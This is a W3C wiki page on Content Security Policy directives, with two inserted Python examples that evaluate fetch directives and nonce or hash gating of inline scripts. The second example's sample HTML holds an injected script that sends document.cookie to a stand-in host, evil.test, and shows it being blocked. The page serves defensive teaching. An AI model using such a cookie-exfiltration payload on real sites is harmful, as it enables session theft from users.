Latest revision as of 23:26, 30 September 2013
Content Security Policy
- Current editor's draft: https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html
- Use Cases: http://www.w3.org/Security/wiki/Use_Cases_for_Content_Security_Policies
- Test Assertions: http://www.w3.org/Security/wiki/Test_Assertions_For_Content_Security_Policy
Directives
A Content-Security-Policy consists of a number of directives. This section lists the maturity level of the directives the working group is currently aware of.
Version 1.0
These directives are included in CSP 1.0.
- default-src
- script-src
- object-src
- img-src
- media-src
- style-src
- frame-src
- font-src
- connect-src
- report-uri
- sandbox (optional)
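The following is an added example, not code from this wiki page or from any browser's implementation: a small Python evaluator for the nine CSP 1.0 fetch directives listed above. It parses a header value, applies the default-src fallback that every fetch directive inherits, and matches URLs against source expressions using the CSP 1.0 rules ('none', 'self', a bare `*`, scheme-only sources such as `https:`, and host sources with an optional scheme, a leading `*.` wildcard and an optional port). report-uri and sandbox are parsed but take no part in load decisions. The function names, the sample policy and the document origin are this example's own constructions.

```python
"""Added example (not code from the wiki or from a browser): an evaluator for
the nine CSP 1.0 fetch directives. It parses a header value, applies the
default-src fallback and matches URLs against source expressions following
the CSP 1.0 rules. report-uri and sandbox are parsed but play no part in
load decisions. The sample policy and origin below are constructed.
"""
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443, "ws": 80, "wss": 443, "ftp": 21}

# The CSP 1.0 directives that govern fetches; every one falls back to default-src.
FETCH_DIRECTIVES = {
    "default-src", "script-src", "object-src", "img-src", "media-src",
    "style-src", "frame-src", "font-src", "connect-src",
}


def parse_policy(header):
    """Parse a header value into {directive name: [source expressions]}.

    Directives are ';'-separated; the first occurrence of a name wins and
    later duplicates are ignored, as CSP 1.0 specifies.
    """
    policy = {}
    for raw in header.split(";"):
        tokens = raw.split()
        if tokens and tokens[0].lower() not in policy:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def _port_of(parts):
    """Effective port of a split URL: the explicit port or the scheme default."""
    return parts.port if parts.port is not None else DEFAULT_PORTS.get(parts.scheme)


def _host_source_matches(expr, url, document_url):
    """Match a host-source such as https://cdn.example.com:443 or *.example.com."""
    scheme, rest = expr.split("://", 1) if "://" in expr else (None, expr)
    host, _, port = rest.partition(":")
    host = host.lower()
    # An explicit scheme must match; without one the protected resource's scheme applies.
    expected_scheme = scheme.lower() if scheme else document_url.scheme
    if url.scheme != expected_scheme:
        return False
    # "*.example.com" matches subdomains only; any other host must match exactly.
    url_host = (url.hostname or "").lower()
    if host.startswith("*."):
        if not url_host.endswith(host[1:]):
            return False
    elif url_host != host:
        return False
    # Port: "*" is any port, an explicit port must match, none means the scheme default.
    if port == "*":
        return True
    if port:
        return _port_of(url) == int(port)
    return _port_of(url) == DEFAULT_PORTS.get(url.scheme)


def source_matches(expr, url, document_url):
    """True if a single source expression permits fetching `url`."""
    keyword = expr.lower()
    if keyword == "*":
        return True
    if keyword == "'none'":
        return False
    if keyword == "'self'":
        return (url.scheme == document_url.scheme
                and (url.hostname or "").lower() == (document_url.hostname or "").lower()
                and _port_of(url) == _port_of(document_url))
    if keyword in ("'unsafe-inline'", "'unsafe-eval'"):
        return False  # these govern inline script and eval(), not URL fetches
    if keyword.endswith(":") and "://" not in keyword:
        return url.scheme == keyword[:-1]  # scheme-source such as https:
    return _host_source_matches(expr, url, document_url)


def allows_load(policy, directive, url, document_url):
    """Decide whether `directive` permits the document at `document_url` to fetch `url`.

    A missing directive falls back to default-src; if that is missing too,
    CSP 1.0 places no restriction on the load.
    """
    if directive not in FETCH_DIRECTIVES:
        raise ValueError(f"{directive} is not a CSP 1.0 fetch directive")
    sources = policy.get(directive, policy.get("default-src"))
    if sources is None:
        return True
    url_parts, doc_parts = urlsplit(url), urlsplit(document_url)
    return any(source_matches(s, url_parts, doc_parts) for s in sources)


if __name__ == "__main__":
    # Constructed sample policy and document origin.
    policy = parse_policy(
        "default-src 'self'; script-src 'self' https://cdn.example.com; "
        "img-src *; object-src 'none'; report-uri /csp-report"
    )
    doc = "https://app.example.com/index.html"
    checks = [
        ("script-src", "https://cdn.example.com/lib.js"),
        ("script-src", "https://cdn.example.com:8443/lib.js"),
        ("style-src", "https://cdn.example.com/site.css"),   # falls back to default-src
        ("connect-src", "wss://app.example.com/socket"),      # 'self' is scheme-sensitive in 1.0
        ("object-src", "https://app.example.com/player.swf"),
    ]
    for directive, url in checks:
        verdict = "allowed" if allows_load(policy, directive, url, doc) else "blocked"
        print(f"{directive:12} {url:42} {verdict}")
```

Two behaviours in the sample are worth noticing when writing a real policy: a style-src that is absent inherits default-src, so the CDN allowed for scripts is still blocked for stylesheets, and 'self' in 1.0 compares scheme as well as host and port, so a wss: connection from an https: page needs its own connect-src entry.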
Proposals for Version 1.1
These directives have been proposed for inclusion in CSP 1.1:
- <meta> tag (strawman spec: https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html#html-meta-element--experimental)
- More granular source expressions (file-level paths) (strawman spec: https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html#path-matching)
- A script interface for reading policy details (strawman spec: https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html#script-interfaces--experimental)
- form-action (Restricts the URLs that can be used as form actions) (strawman spec: https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html#form-action--experimental)
- script-nonce (strawman spec: https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html#script-nonce--experimental)
- plugin-types (Provides a whitelist of MIME types for plugins that can be instantiated on this page) (strawman spec: https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html#plugin-types--experimental)
- reflected-xss (Folds X-XSS-Protection into CSP) (strawman spec: https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html#reflected-xss--experimental)
- Including script-sample, from Mozilla's original implementation, in CSP violation reports (useful for false-positive detection, for giving WAFs signatures of payloads, and generally more informative)
- Some sort of DOM event (perhaps 'scriptpolicyviolation' triggered on 'document')
- Restriction on cookie scope (strawman spec: http://lists.w3.org/Archives/Public/public-webappsec/2013Sep/0021.html)
Experimental
Various folks are experimenting with these directives. If one or more of them prove useful, you can propose including them in a version of CSP by sending an email to public-webappsec. Historically, discussion of CSP has taken place at public-web-security, and cross-posting is encouraged.
If you're experimenting with a directive, please feel encouraged to list the directive here and link to a description. Listing your directive here is not a guarantee that other folks won't appropriate its name for another purpose, but it certainly can help avoid that problem.
- allow-modification (Allows modification of the CSP policy while the page is running. See http://lists.w3.org/Archives/Public/public-webappsec/2011Dec/0008.html)
- no-external-navigation (See http://lists.w3.org/Archives/Public/public-webappsec/2011Dec/0016.html)
- no-mixed-content (A simplified directive for blocking mixed content; also includes all child frames.)
- script-hash (contains a list of the digests of loadable scripts)
- no-user-js (Protect against self-xss)
- Option to restrict script-src (or all directives?) to sources with specific content-types.
- An option to allow seamless with parent?
- jsonp-src and jsonp-sink
- referrer (see http://wiki.whatwg.org/wiki/Meta_referrer)
- policy-uri
- https://wiki.mozilla.org/Security/CSP/Strawman contains a bunch of brainstorming that might lead to useful directive ideas
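The following is an added example, not code from this wiki page or from any browser, covering two of the items above together: script-nonce (under Proposals for Version 1.1) and script-hash (under Experimental). Both are ways to let a page run specific inline scripts without opening the door to injected ones via 'unsafe-inline'. Neither directive's syntax is fixed on this page, so the example assumes that script-nonce carries a single unguessable token per response, echoed back as a `nonce` attribute on the legitimate `<script>` elements, and that script-hash lists hex SHA-256 digests of permitted script bodies prefixed with `sha256-`. Those syntaxes, the function names, and the policy, nonce and HTML document are all this example's own assumptions and constructions.

```python
"""Added example (not from the wiki or any browser): gating inline <script>
elements on the proposed script-nonce and experimental script-hash directives.

Assumed syntax, since neither is fixed on the page:
  script-nonce <token>          one unguessable token per response, echoed
                                as <script nonce="...">
  script-hash sha256-<hex> ...  hex SHA-256 digests of permitted script bodies
An inline script runs if script-src allows 'unsafe-inline', its nonce attribute
equals the policy nonce, or the digest of its body is listed. The policy dict,
nonce and HTML below are constructed for demonstration.
"""
import hashlib
import hmac
import re
import secrets

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
NONCE_ATTR_RE = re.compile(r'\bnonce\s*=\s*"([^"]*)"', re.IGNORECASE)
SRC_ATTR_RE = re.compile(r"\bsrc\s*=", re.IGNORECASE)


def new_nonce():
    """Fresh per-response nonce: unpredictable and never reused across responses."""
    return secrets.token_urlsafe(16)


def script_digest(body):
    """Digest of the script body exactly as it appears between the tags."""
    return "sha256-" + hashlib.sha256(body.encode("utf-8")).hexdigest()


def inline_script_allowed(policy, attrs, body):
    """Decide whether one inline <script attrs>body</script> may execute.

    `policy` maps directive name -> list of values, as a CSP parser produces.
    """
    if "script-src" not in policy and "default-src" not in policy:
        return True  # no script restriction in effect at all
    script_src = policy.get("script-src", policy.get("default-src", []))
    if "'unsafe-inline'" in (s.lower() for s in script_src):
        return True
    match = NONCE_ATTR_RE.search(attrs)
    if match:
        supplied = match.group(1).encode("utf-8")
        # Constant-time comparison: injected markup can carry any attribute value.
        if any(hmac.compare_digest(supplied, n.encode("utf-8"))
               for n in policy.get("script-nonce", [])):
            return True
    return script_digest(body) in policy.get("script-hash", [])


def evaluate_document(policy, html):
    """Return [(first 40 chars of body, allowed)] for each inline script in `html`."""
    results = []
    for match in SCRIPT_RE.finditer(html):
        attrs, body = match.group(1), match.group(2)
        if SRC_ATTR_RE.search(attrs):
            continue  # external scripts are judged by script-src host matching instead
        results.append((body.strip()[:40], inline_script_allowed(policy, attrs, body)))
    return results


# Constructed sample: a nonce-bearing script the server emitted, an external
# script, a static script whose digest is pinned, and an injected script.
SAMPLE_NONCE = "9zJ3Qm1nVn4cDq6a2bW5qA"   # in production: new_nonce() per response
SAMPLE_POLICY = {
    "script-src": ["'self'"],
    "script-nonce": [SAMPLE_NONCE],
    "script-hash": [script_digest("initAnalytics();")],
}
SAMPLE_HTML = f"""
<script nonce="{SAMPLE_NONCE}">bootstrap();</script>
<script src="/static/app.js"></script>
<script>initAnalytics();</script>
<script>location='https://evil.test/?c='+document.cookie</script>
"""

if __name__ == "__main__":
    for snippet, allowed in evaluate_document(SAMPLE_POLICY, SAMPLE_HTML):
        print(f"{'run    ' if allowed else 'blocked'}  {snippet}")
```

The injected script in the sample is blocked because the attacker controls only the markup, not the response header: it cannot know the per-response nonce, and changing even one byte of a hash-pinned body changes its digest. The nonce must therefore be generated fresh for every response; a static or predictable nonce is no better than 'unsafe-inline'.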
Implementations
- WebKit implementation is now (roughly) feature-complete; by Adam Barth 11-May-2011
- Firefox implementation is also (roughly) feature-complete
- Internet Explorer 10 Platform Preview has a partial implementation